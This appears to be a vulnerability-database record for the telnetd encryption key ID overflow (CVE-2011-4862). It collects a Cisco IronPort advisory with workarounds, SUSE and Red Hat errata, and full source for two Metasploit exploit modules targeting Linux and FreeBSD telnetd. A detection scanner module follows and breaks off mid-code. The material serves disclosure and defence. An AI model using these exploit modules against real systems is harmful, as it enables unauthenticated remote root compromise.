link:\r\n\r\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\r\n\r\nAffected Products\r\n=================\r\n\r\nVulnerable Products\r\n+------------------\r\n\r\nThe following Cisco 
IronPort Email Security Appliances (ESA) and\r\nCisco IronPort Security Management Appliances (SMA) are affected by\r\nthis vulnerability:\r\n\r\n * Cisco IronPort Email Security Appliance (C-Series and X-Series)\r\n versions prior to 7.6.0\r\n\r\n * Cisco IronPort Security Management Appliance (M-Series) versions\r\n prior to 7.8.0\r\n\r\n\r\nNote: Fixed software versions are not yet available. Please consult\r\nthe Obtaining Fixed Software section of this advisory for more\r\ninformation.\r\n\r\nProducts Confirmed Not Vulnerable\r\n+--------------------------------\r\n\r\nCisco IronPort Web Security Appliances (S-Series) are not affected by\r\nthis vulnerability. \r\n\r\nNo other Cisco products are currently known to be affected by this\r\nvulnerability.\r\n\r\nDetails\r\n=======\r\n\r\nThe Cisco IronPort ESA provides email management and protection\r\ncombining antispam, antivirus, encryption, digital rights management,\r\nand archiving technologies. The Cisco IronPort SMA is a flexible\r\nmanagement tool designed to centralize and consolidate policy and\r\nruntime data, providing a single management interface for multiple\r\nCisco IronPort security appliances.\r\n\r\nThe Cisco IronPort ESA and the Cisco IronPort SMA run AsyncOS, a\r\nmodified version of the FreeBSD kernel.\r\n\r\nThese devices are affected by the FreeBSD telnetd remote code\r\nexecution vulnerability documented by Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2011-4862. This vulnerability could\r\nallow a remote, unauthenticated attacker to run arbitrary code with\r\nelevated privileges.\r\n\r\nThe vulnerability is documented in Cisco IronPort bug 83262.\r\n\r\nNote: Cisco IronPort tracks bugs using an internal system that is not\r\navailable to customers. 
The Cisco IronPort bug tracking identifiers\r\nare provided for reference only.\r\n\r\nVulnerability Scoring Details\r\n=============================\r\n\r\nCisco has scored the vulnerability in this advisory based on the\r\nCommon Vulnerability Scoring System (CVSS). The CVSS scoring in this\r\nsecurity advisory is in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps organizations determine the urgency and priority\r\nof a response.\r\n\r\nCisco has provided a base and temporal score. Customers can also\r\ncompute environmental scores that help determine the impact of the\r\nvulnerability in their own networks.\r\n\r\nCisco has provided additional information regarding CVSS at the\r\nfollowing link:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to compute the\r\nenvironmental impact for individual networks at the following link:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n\r\n* CVE-2011-4862/Ironport #83262 ("Telnetd encrypt_keyid vulnerability")\r\n\r\nCVSS Base Score - 10.0\r\n Access Vector - Network\r\n Access Complexity - Low\r\n Authentication - None\r\n Confidentiality Impact - Complete\r\n Integrity Impact - Complete\r\n Availability Impact - Complete\r\n\r\nCVSS Temporal Score - 9.0\r\n Exploitability - Functional\r\n Remediation Level - Workaround\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nSuccessful exploitation of this vulnerability could allow a remote,\r\nunauthenticated attacker to execute arbitrary code with elevated\r\nprivileges.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nFixes for the vulnerability described in this advisory are not yet\r\navailable; however, there are configuration workarounds available\r\nthat may eliminate the risk for most customers. 
Please see the\r\nWorkarounds section of this advisory for information on the\r\nmitigation of this vulnerability.\r\n\r\nCisco IronPort Email Security Appliance (C-Series and X-Series)\r\nversions prior to 7.6.0 are affected. Version 7.6.0 will include\r\nfixes for this issue when available.\r\n\r\nCisco IronPort Security Management Appliance (M-Series) versions\r\nprior to 7.8.0 are affected. Versions 7.8.0 and 7.9.0 will include\r\nfixes for this issue when available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nBy default, Telnet is configured on the Management port. Telnet\r\nservices can be disabled to mitigate this vulnerability.\r\nAdministrators can disable Telnet by using the administration\r\ngraphical user interface (GUI) or by using the "interfaceconfig"\r\ncommand in the command-line interface (CLI). As a security best\r\npractice, customers should use Secure Shell (SSH) instead of Telnet.\r\n\r\nComplete the following steps to disable Telnet via the GUI:\r\n\r\nStep 1: Navigate to Network > IP Interfaces > interface_name.\r\n\r\nStep 2: Remove the check from the box next to the Telnet service.\r\n\r\nStep 3: Click on the Submit button to submit the change.\r\n\r\nStep 4: Click the Commit Change button for these changes to take effect.\r\n\r\nUse the "interfaceconfig" command, as shown in the example below to\r\ndisable Telnet via the CLI.\r\n\r\n+-----------------------------------------------------------\r\nmail3.example.com> interfaceconfig\r\n\r\n\r\nCurrently configured interfaces:\r\n1. Data 1 (192.168.1.1/24 on Data1: mail3.example.com)\r\n2. Data 2 (192.168.2.1/24 on Data2: mail3.example.com)\r\n3. 
Management (192.168.42.42/24 on Management: mail3.example.com)\r\n \r\nChoose the operation you want to perform:\r\n - NEW - Create a new interface.\r\n - EDIT - Modify an interface.\r\n - GROUPS - Define interface groups.\r\n - DELETE - Remove an interface.\r\n \r\n[]> edit\r\n\r\n\r\nEnter the number of the interface you wish to edit.\r\n[]> 3\r\n\r\n<output omitted>\r\n\r\nDo you want to enable Telnet on this interface? [N]> N\r\nDo you want to enable SSH on this interface? [N]> Y\r\n+-----------------------------------------------------------\r\n\r\n\r\nNote: The "interfaceconfig" command is described in detail in the\r\nsection "Other Tasks in the GUI" in the Cisco IronPort AsyncOS Daily\r\nManagement Guide available at the following link:\r\n\r\nhttp://www.cisco.com/en/US/docs/security/esa/esa7.5/ESA_7.5_Daily_Management_Guide.pdf\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco Ironport has not yet released software updates that address\r\nthis vulnerability. The affected products in this advisory are\r\ndirectly supported by Cisco IronPort. Customers should contact Cisco\r\nIronPort technical support at the link below to obtain software\r\nfixes. Cisco IronPort technical support can assist customers in\r\ndetermining the correct fixes and installation procedures. Customers\r\nshould direct all warranty questions to Cisco IronPort technical\r\nsupport.\r\n\r\nNote: Do not contact psirt@cisco.com or security-alert@cisco.com for\r\nsoftware upgrades.\r\n\r\nhttp://www.ironport.com/support/contact_support.html\r\n\r\nCustomers with Service Contracts\r\n+-------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. 
For most customers, upgrades should be obtained\r\nthrough the Software Center on Cisco.com at http://www.cisco.com.\r\n\r\nCustomers Using Third-Party Support Organizations\r\n+------------------------------------------------\r\n\r\nCustomers with Cisco products that are provided or maintained through\r\nprior or existing agreements with third-party support organizations,\r\nsuch as Cisco Partners, authorized resellers, or service providers,\r\nshould contact that organization for assistance with the appropriate\r\ncourse of action.\r\n\r\nThe effectiveness of any workaround or fix depends on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Because of the variety of\r\naffected products and releases, customers should consult their\r\nservice providers or support organizations to ensure that any applied\r\nworkaround or fix is the most appropriate in the intended network\r\nbefore it is deployed.\r\n\r\nCustomers Without Service Contracts\r\n+----------------------------------\r\n\r\nCustomers who purchase directly from Cisco but do not hold a Cisco\r\nservice contract and customers who make purchases through third-party\r\nvendors but are unsuccessful in obtaining fixed software through\r\ntheir point of sale should obtain upgrades by contacting the Cisco\r\nTechnical Assistance Center (TAC):\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have the product serial number available and be\r\nprepared to provide the URL of this advisory as evidence of\r\nentitlement to a free upgrade. 
Customers without service contracts\r\nshould request free upgrades through the TAC.\r\n\r\nRefer to Cisco Worldwide Contacts at\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, instructions, and e-mail addresses for support in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThe vulnerability in the telnetd service that affects these Cisco\r\nIronPort appliances was publicly disclosed by the FreeBSD Project on\r\nDecember 23rd, 2011. The FreeBSD Project advisory is available at: \r\n\r\nhttp://security.freebsd.org/advisories/FreeBSD-SA-11:08.telnetd.asc\r\n \r\nThe Cisco Product Security Incident Response Team (PSIRT) is aware of\r\nexploit modules for the Metasploit Framework that can exploit this\r\nvulnerability on affected Cisco IronPort appliances.\r\n\r\nStatus of This Notice: Interim\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY\r\nKIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME. 
CISCO EXPECTS TO UPDATE THIS DOCUMENT AS NEW\r\nINFORMATION BECOMES AVAILABLE.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that\r\nomits the distribution URL in the following section is an\r\nuncontrolled copy, and may lack important information or contain\r\nfactual errors.\r\n\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco Security Intelligence Operations at\r\nthe following link:\r\n\r\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\r\n\r\nAdditionally, a text version of this advisory is clear signed with\r\nthe Cisco PSIRT PGP key and circulated among the following e-mail\r\naddresses:\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n\r\nFuture updates of this advisory, if any, will reside on Cisco.com but\r\nmay not be announced on mailing lists. Users can monitor this\r\nadvisory's URL for any updates.\r\n\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2012-January-26 | Initial public release. |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information about reporting security vulnerabilities in Cisco\r\nproducts, obtaining assistance with security incidents, and registering\r\nto receive security information from Cisco is available on Cisco.com at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis web page includes instructions for press inquiries\r\nregarding Cisco Security Advisories. 
All Cisco Security Advisories are\r\navailable at http://www.cisco.com/go/psirt.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niF4EAREIAAYFAk8hkcgACgkQQXnnBKKRMNDsEQEAgIcgfpN782STBUSoeNscHx7y\r\nalfW8QN3Z7EBYwJQ2RMA+gKs/s2JNwwOlA0zkOxx0joHod23SwlqApMZS/Qb3nps\r\n=Jl0R\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-30T00:00:00", "published": "2012-01-30T00:00:00", "id": "SECURITYVULNS:DOC:27599", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27599", "title": "Cisco Security Advisory: Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:19:38", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "This update of heimdal fixes one security issues:\n\n * CVE-2011-4862: A remote code execution in the\n kerberized telnet daemon was fixed. (This only affects the\n ktelnetd from the heimdal RPM, not the regular telnetd\n supplied by SUSE.)\n", "edition": 1, "modified": "2012-01-05T12:08:59", "published": "2012-01-05T12:08:59", "id": "SUSE-SU-2012:0024-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00031.html", "title": "Security update for heimdal (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "This update of heimdal fixes one security issues:\n\n * CVE-2011-4862: A remote code execution in the\n kerberized telnet daemon was fixed. 
(This only affects the\n ktelnetd from the heimdal RPM, not the regular telnetd\n supplied by SUSE.)\n", "edition": 1, "modified": "2012-01-05T12:36:30", "published": "2012-01-05T12:36:30", "id": "SUSE-SU-2012:0056-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00039.html", "title": "Security update for heimdal (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1526", "CVE-2011-4862"], "edition": 1, "description": "This update of krb5 fixes two security issues.\n\n * CVE-2011-4862: A remote code execution in the\n kerberized telnet daemon was fixed. (This only affects the\n ktelnetd from the krb5-appl RPM, not the regular telnetd\n supplied by SUSE.)\n * CVE-2011-1526 / MITKRB5-SA-2011-005: Fixed krb5 ftpd\n unauthorized file access problems.\n", "modified": "2012-01-05T12:08:41", "published": "2012-01-05T12:08:41", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00028.html", "id": "SUSE-SU-2012:0018-1", "title": "Security update for Kerberos 5 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\nrlogin clients and servers. Kerberos is a network authentication system\nwhich allows clients and servers to authenticate to each other using\nsymmetric encryption and a trusted third-party, the Key Distribution Center\n(KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd). A \nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. 
(CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version of\nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have enabled the \nkrb5 telnet daemon, and have it accessible remotely, this update should be\napplied immediately. \n\nAll krb5-appl-server users should upgrade to these updated packages, which \ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:22", "published": "2011-12-27T05:00:00", "id": "RHSA-2011:1852", "href": "https://access.redhat.com/errata/RHSA-2011:1852", "type": "redhat", "title": "(RHSA-2011:1852) Critical: krb5-appl security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "Kerberos is a network authentication system which allows clients and\nservers to authenticate to each other using symmetric encryption and a\ntrusted third-party, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd).\nA remote attacker who can access the telnet port of a target machine could\nuse this flaw to execute arbitrary code as root. (CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. 
This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have enabled the\ntelnet daemon, and have it accessible remotely, this update should be\napplied immediately.\n\nAll krb5-workstation users should upgrade to these updated packages, which \ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T11:58:33", "published": "2011-12-28T05:00:00", "id": "RHSA-2011:1853", "href": "https://access.redhat.com/errata/RHSA-2011:1853", "type": "redhat", "title": "(RHSA-2011:1853) Critical: krb5 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "Kerberos is a network authentication system which allows clients and servers\nto authenticate to each other using symmetric encryption and a trusted third-\nparty, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd). A\nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. (CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any version of \nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have enabled the\ntelnet daemon, and have it accessible remotely, this update should be\napplied immediately. 
\n\nAll krb5-workstation users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T11:51:56", "published": "2011-12-27T05:00:00", "id": "RHSA-2011:1851", "href": "https://access.redhat.com/errata/RHSA-2011:1851", "type": "redhat", "title": "(RHSA-2011:1851) Critical: krb5 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\nrlogin clients and servers. Kerberos is a network authentication system\nwhich allows clients and servers to authenticate to each other using\nsymmetric encryption and a trusted third-party, the Key Distribution Center\n(KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd).\nA remote attacker who can access the telnet port of a target machine could\nuse this flaw to execute arbitrary code as root. (CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have enabled\nthe krb5 telnet daemon, and have it accessible remotely, this update should\nbe applied immediately. 
\n\nAll krb5-appl-server users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2016-04-04T18:44:27", "published": "2011-12-28T05:00:00", "id": "RHSA-2011:1854", "href": "https://access.redhat.com/errata/RHSA-2011:1854", "type": "redhat", "title": "(RHSA-2011:1854) Critical: krb5-appl security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:46:53", "description": "This module exploits a buffer overflow in the encryption option handler of the Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions use NetKit-derived telnet daemons, so this flaw only applies to a small subset of Linux systems running telnetd.\n", "published": "2011-12-28T06:00:10", "type": "metasploit", "title": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/TELNET/TELNET_ENCRYPT_KEYID", "href": "", "sourceData": "# -*- coding: binary -*-\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Telnet\n include Msf::Exploit::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the encryption option handler of the\n Linux BSD-derived telnet service (inetutils or krb5-telnet). 
Most Linux distributions\n use NetKit-derived telnet daemons, so this flaw only applies to a small subset of\n Linux systems running telnetd.\n },\n 'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2011-4862'],\n ['OSVDB', '78020'],\n ['BID', '51182'],\n ['EDB', '18280']\n ],\n 'Privileged' => true,\n 'Platform' => 'linux',\n 'Payload' =>\n {\n 'Space' => 200,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true,\n },\n\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2011-12-23'))\n end\n\n def exploit_target(t)\n\n connect\n banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\n vprint_status(banner_sanitized)\n\n enc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\n enc_keyid = \"\\xff\\xfa\\x26\\x07\"\n end_suboption = \"\\xff\\xf0\"\n\n penc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\n\n key_id = Rex::Text.rand_text_alphanumeric(400)\n\n key_id[ 0, 2] = \"\\xeb\\x76\"\n key_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\n key_id[76, 4] = [ t['Ret'] ].pack(\"V\")\n\n # Some of these bytes can get mangled, jump over them\n key_id[80,40] = \"\\x41\" * 40\n\n # Insert the real payload\n key_id[120, penc.length] = penc\n\n # Create the Key ID command\n sploit = enc_keyid + key_id + end_suboption\n\n # Initiate encryption\n sock.put(enc_init)\n\n # Wait for a successful response\n loop do\n data = sock.get_once(-1, 5) rescue nil\n if not data\n fail_with(Failure::Unknown, \"This system does not support encryption\")\n end\n break if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\n end\n\n # The first request smashes the pointer\n print_status(\"Sending first payload\")\n sock.put(sploit)\n\n # Make sure the server replied to the first request\n data = 
sock.get_once(-1, 5)\n unless data\n print_status(\"Server did not respond to first payload\")\n return\n end\n\n # Some delay between each request seems necessary in some cases\n ::IO.select(nil, nil, nil, 0.5)\n\n # The second request results in the pointer being called\n print_status(\"Sending second payload...\")\n sock.put(sploit)\n handler\n\n ::IO.select(nil, nil, nil, 0.5)\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/telnet/telnet_encrypt_keyid.rb"}, {"lastseen": "2020-08-20T12:43:12", "description": "This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.\n", "published": "2011-12-28T05:37:30", "type": "metasploit", "title": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/FREEBSD/TELNET/TELNET_ENCRYPT_KEYID", "href": "", "sourceData": "# -*- coding: binary -*-\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Telnet\n include Msf::Exploit::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the encryption option handler of the\n FreeBSD telnet service.\n },\n 'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2011-4862'],\n ['OSVDB', '78020'],\n ['BID', '51182'],\n ['EDB', '18280']\n ],\n 'Privileged' => true,\n 'Platform' => 'bsd',\n 'Payload' =>\n 
{\n 'Space' => 128,\n 'BadChars' => \"\\x00\",\n },\n\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx\n [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx\n [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx\n [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx\n [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx\n [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx\n [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx\n [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx\n # [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)\n [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return\n # Versions 5.2 and below do not support encyption\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 23 2011'))\n end\n\n def exploit_target(t)\n\n connect\n banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\n vprint_status(banner_sanitized)\n\n enc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\n enc_keyid = \"\\xff\\xfa\\x26\\x07\"\n end_suboption = \"\\xff\\xf0\"\n\n # Telnet protocol requires 0xff to be escaped with another\n penc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\n\n key_id = Rex::Text.rand_text_alphanumeric(400)\n key_id[ 0, 2] = \"\\xeb\\x76\"\n key_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\n key_id[76, 4] = [ t['Ret'] ].pack(\"V\")\n\n # Some of these bytes can get mangled, jump over them\n key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)\n\n # Bounce to the real payload (avoid corruption)\n key_id[120, 2] = \"\\xeb\\x46\"\n\n # The actual payload\n key_id[192, penc.length] = penc\n\n # Create the Key ID command\n sploit = enc_keyid + key_id + end_suboption\n\n # Initiate encryption\n sock.put(enc_init)\n\n # Wait for a successful response\n loop do\n data = sock.get_once(-1, 5) rescue nil\n if not data\n 
fail_with(Failure::Unknown, \"This system does not support encryption\")\n end\n break if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\n end\n\n # The first request smashes the pointer\n print_status(\"Sending first payload\")\n sock.put(sploit)\n\n # Make sure the server replied to the first request\n data = sock.get_once(-1, 5)\n unless data\n print_status(\"Server did not respond to first payload\")\n return\n end\n\n # Some delay between each request seems necessary in some cases\n ::IO.select(nil, nil, nil, 0.5)\n\n # The second request results in the pointer being called\n print_status(\"Sending second payload...\")\n sock.put(sploit)\n\n handler\n\n ::IO.select(nil, nil, nil, 0.5)\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb"}, {"lastseen": "2020-07-19T07:10:42", "description": "Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)\n", "published": "2011-12-27T23:50:06", "type": "metasploit", "title": "Telnet Service Encryption Key ID Overflow Detection", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/TELNET/TELNET_ENCRYPT_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Telnet\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'Telnet Service Encryption Key ID Overflow Detection',\n 'Description' => 'Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)',\n 'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' 
=>\n [\n ['BID', '51182'],\n ['CVE', '2011-4862'],\n ['EDB', '18280'],\n ['URL', 'https://blog.rapid7.com/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']\n ]\n )\n register_options(\n [\n Opt::RPORT(23),\n OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30])\n ])\n end\n\n def to\n return 30 if datastore['TIMEOUT'].to_i.zero?\n datastore['TIMEOUT'].to_i\n end\n\n def run_host(ip)\n begin\n ::Timeout.timeout(to) do\n res = connect\n\n # This makes db_services look a lot nicer.\n banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\n svc = report_service(:host => rhost, :port => rport, :name => \"telnet\", :info => banner_sanitized)\n\n # Check for encryption option ( IS(0) DES_CFB64(1) )\n sock.put(\"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\")\n\n loop do\n data = sock.get_once(-1, to) rescue nil\n if not data\n print_status(\"#{ip}:#{rport} Does not support encryption: #{banner_sanitized} #{data.to_s.unpack(\"H*\")[0]}\")\n return\n end\n break if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\n end\n\n buff_good = \"\\xff\\xfa\\x26\" + \"\\x07\" + \"\\x00\" + (\"X\" * 63) + \"\\xff\\xf0\"\n buff_long = \"\\xff\\xfa\\x26\" + \"\\x07\" + \"\\x00\" + (\"X\" * 64) + ( \"\\xcc\" * 32) + \"\\xff\\xf0\"\n\n begin\n\n #\n # Send a long, but within boundary Key ID\n #\n sock.put(buff_good)\n data = sock.get_once(-1, 5) rescue nil\n unless data\n 